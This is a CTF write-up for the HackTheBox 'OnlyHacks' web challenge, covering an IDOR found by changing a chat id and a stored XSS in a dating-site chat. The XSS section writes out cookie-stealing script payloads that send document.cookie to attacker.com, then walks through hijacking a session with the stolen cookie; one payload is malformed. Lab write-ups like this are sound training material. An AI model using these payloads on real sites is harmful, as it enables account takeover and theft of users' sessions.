> For the complete documentation index, see [llms.txt](https://ymiir.gitbook.io/nota/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ymiir.gitbook.io/nota/2025-stuff/ctf-writeup/htb-ctf-onlyhacks.md).

# HTB-CTF {OnlyHacks}

## CHALLENGE DESCRIPTION

Dating and matching can be exciting, especially during Valentine's, but it’s important to stay vigilant for impostors. Can you help identify possible frauds?

***

## **Challenge Information**

* **Category:** Web
* **Difficulty:** Very Easy
* **Objective:** Exploit web vulnerabilities to retrieve the flag.
* **Tag :** IDOR , XSS

***

## **Identifying Functionality**

Upon accessing the **OnlyHacks** website, the following functionalities were observed:

* **Login Page (/login)** – Users can log in using their credentials.
* **Registration Page (/register)** – New users can sign up.
* **Dashboard (/dashboard)** – Displays user profiles for matching.
* **Match Page (/chat)** – Shows matched users and chat functionality.

![/login page](https://175785160-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fv5xJ9SHBm6KJIr4fPHYU%2Fuploads%2F37QUe4Goi3GxzSDR0hC4%2F0.png?alt=media)

![/register page](https://175785160-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fv5xJ9SHBm6KJIr4fPHYU%2Fuploads%2FBBBLuUuTToNBpCEFbss4%2F1.png?alt=media)

***

## SOLUTION

### IDOR

#### **Vulnerability Analysis**

* The **chat system** was vulnerable to **IDOR** due to improper access control.
* The **chat endpoint** used sequential numerical IDs, allowing an attacker to manipulate them.
* By modifying the **id parameter**, retrieving another user's match details was possible, revealing the **flag**.

#### **Exploitation Steps**

1. **Register and log in** to the website.
2. **Like** all profiles which only have 4 users.

![/dashboard with option to like and reject](https://175785160-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fv5xJ9SHBm6KJIr4fPHYU%2Fuploads%2FGlwLYfNg5XExB5rfcKtD%2F2.png?alt=media)

3. Navigate to the /chat page.

![/chat page. Only Retana matches](https://175785160-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fv5xJ9SHBm6KJIr4fPHYU%2Fuploads%2FsZvCY8iJ3Kg1RWzhjh2D%2F3.png?alt=media)

4. The requested URL was observed as:

`https://IPHTB/chat/?id=6`

5. Brute-force and get the 200 responses.
6. Change `id=6 to id=3`

<figure><img src="https://175785160-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fv5xJ9SHBm6KJIr4fPHYU%2Fuploads%2FNcKYicd231aE3xG8RF8i%2Fimage.png?alt=media&amp;token=cb08d64b-618d-4cfd-8ba9-e7be3a8dce04" alt=""><figcaption><p>/id=3 reveal a flag.</p></figcaption></figure>

7. The response revealed the flag

***

### Stored Cross-Site Scripting (XSS) – Chat Exploit

#### **Vulnerability Analysis**

* The **chat feature** was vulnerable to **Stored XSS**, meaning malicious JavaScript was executed whenever another user viewed the chat.
* This could be leveraged to **steal session cookies** and impersonate other users.

#### **Exploitation Steps**

1. Send testing payload in chat

`For testing -- <h1>Hello</h1>`

![with testing paylaod.](https://175785160-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fv5xJ9SHBm6KJIr4fPHYU%2Fuploads%2FqUWqjJqZmvT0IdFVDqYi%2F5.png?alt=media)

2. Send the following **malicious XSS payload** in chat.

`<script>document.location="http://attacker.com/?cookie="+document.cookie</script>`

`<script>fetch(http://attacker.com/?cookie="+document.cookie)</script>`

3. When Retana views the chat, the script executes, sending their session cookie to the attacker.

![response in webhook.](https://175785160-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fv5xJ9SHBm6KJIr4fPHYU%2Fuploads%2FHwLzJgHOYZmrZ3XFihk3%2F6.png?alt=media)

1. Replace our session cookie with the stolen one.

![changing the cookies to stolen one.](https://175785160-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fv5xJ9SHBm6KJIr4fPHYU%2Fuploads%2FGm2ebfFV0EnRcQF2aXI8%2F7.png?alt=media)

1. Reloading the page logs the attacker into Retana’s account.

![Impersonate as Retana and get the flag from Dimistris](https://175785160-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fv5xJ9SHBm6KJIr4fPHYU%2Fuploads%2Fqy7gXJRlP1RFyF6jEslN%2F8.png?alt=media)
